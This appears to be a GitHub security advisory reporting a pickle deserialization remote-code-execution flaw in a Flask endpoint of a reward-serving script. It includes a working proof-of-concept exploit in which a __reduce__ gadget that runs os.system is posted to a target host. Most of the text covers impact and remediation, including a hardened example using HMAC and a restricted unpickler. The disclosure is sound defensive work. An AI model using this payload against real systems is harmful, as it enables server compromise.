[Security] Unauthenticated RCE via Pickle Deserialization in serve_general_reward.py (CWE-502) #6

@xiaoyaoyou2

Description

Summary

CVSS 9.8 (Critical) — Unauthenticated Remote Code Execution via unsafe pickle.loads() on raw HTTP request body in scripts/serve_general_reward.py.

Affected Code

File: scripts/serve_general_reward.py:29

from flask import Flask, request  # imports reconstructed for context; the script's import block is not shown in the report
import pickle
root = Flask(__name__)  # the script's Flask app object, as referenced by root.route below
@root.route("/", methods=["POST"])
def inference():
    data = request.get_data()     # raw request body, no authentication or content check
    payload = pickle.loads(data)  # ← RCE via untrusted deserialization

The Flask endpoint accepts POST requests to / with ZERO authentication. The raw HTTP body is passed directly to pickle.loads(), which executes arbitrary Python code during deserialization.

Impact

Complete server compromise. Any unauthenticated attacker on the network (the host defaults to 127.0.0.1 but can be overridden via GENERAL_REWARD_HOST env var) can:

  1. Execute arbitrary OS commands
  2. Steal ML models and training data
  3. Establish persistence on the server

Proof of Concept

import os
import pickle

import requests


class Exploit:
    # pickle.loads() on the server invokes os.system("id > /tmp/pwned_worldr1")
    # while rebuilding this object, before the handler ever sees the payload.
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned_worldr1",))


payload = pickle.dumps(Exploit())  # serialising only records the callable; nothing runs on the attacker's side
requests.post("http://TARGET:8090/", data=payload)  # TARGET: host running serve_general_reward.py on port 8090

Fix

Replace pickle with JSON serialization (json.loads). If pickle is required for internal communication, add authentication (HMAC/API key) and only accept connections from trusted sources.
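The following is an added example of both remediation paths described above; it is not code from the World-R1 repository or from the reporter. It models the handler as plain functions so it runs without Flask: requests are authenticated with an HMAC-SHA256 over the body (constant-time compare), and, where pickle must be kept, deserialisation goes through a restricted Unpickler that refuses every global lookup, so a `__reduce__` gadget such as `os.system` is rejected before any code runs. The shared key, the `X-Reward-Signature` header name and the request shape are assumptions constructed for the example.

```python
import hashlib
import hmac
import io
import json
import os
import pickle

# Constructed for this example: a 32-byte shared secret. A real deployment would
# load it from the environment or a secrets store, never hard-code it.
SHARED_KEY = b"\x42" * 32

# Hypothetical header that carries the hex HMAC of the request body. The project
# defines no such header; the name is an assumption of this example.
SIGNATURE_HEADER = "X-Reward-Signature"


def sign(key: bytes, body: bytes) -> str:
    """HMAC-SHA256 over the exact bytes that will be deserialised."""
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def verify(key: bytes, body: bytes, signature: str) -> bool:
    """Constant-time comparison; a plain == on the hex strings leaks timing."""
    expected = sign(key, body).encode("ascii")
    presented = (signature or "").encode("utf-8", errors="replace")
    return hmac.compare_digest(expected, presented)


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup.

    dict, list, tuple, str, bytes, int, float, bool and None are built from
    dedicated opcodes and never reach find_class, so reward requests made of
    those still load. A gadget such as os.system is encoded as a
    GLOBAL/STACK_GLOBAL opcode and is rejected here before it can be called.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_pickle_loads(body: bytes):
    return RestrictedUnpickler(io.BytesIO(body)).load()


def handle_pickle_request(body: bytes, signature: str, key: bytes = SHARED_KEY):
    """Hardened handler for the pickle-kept variant: authenticate, then deserialise.

    Returns (http_status, payload_or_error) instead of a Flask response so the
    logic can be exercised without a web server.
    """
    if not verify(key, body, signature):
        return 401, {"error": "missing or invalid signature"}
    try:
        return 200, safe_pickle_loads(body)
    except pickle.UnpicklingError as exc:
        return 400, {"error": str(exc)}


def handle_json_request(body: bytes):
    """Preferred fix: JSON carries data only, so no gadget chain is possible."""
    try:
        return 200, json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        return 400, {"error": f"malformed JSON: {exc}"}


class Gadget:
    """Stand-in for the attacker's payload; the command is harmless on purpose."""

    def __reduce__(self):
        return (os.system, ("echo pwned",))


if __name__ == "__main__":
    benign = pickle.dumps({"prompt": "2+2", "response": "4"})  # constructed request
    print(handle_pickle_request(benign, sign(SHARED_KEY, benign)))    # 200 and the dict
    print(handle_pickle_request(benign, "00" * 32))                   # 401, bad signature
    hostile = pickle.dumps(Gadget())  # dumps only records os.system; it does not call it
    print(handle_pickle_request(hostile, sign(SHARED_KEY, hostile)))  # 400, gadget refused
    print(handle_json_request(b'{"prompt": "2+2", "response": "4"}'))  # 200
```

Note that the restricted unpickler is defence in depth, not a substitute for authentication: even a legitimate, signed client cannot make the server resolve a global, and an unsigned body never reaches the unpickler at all. If the service only needs strings and numbers, the JSON path removes the whole class of bug and is the option to take.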

Disclosure

This project does not have Private Vulnerability Reporting enabled. Please enable it at https://github.com/microsoft/World-R1/security. For private coordination: xiaoyaotom101df2@xiaoyaobot.top

CC @microsoft security team
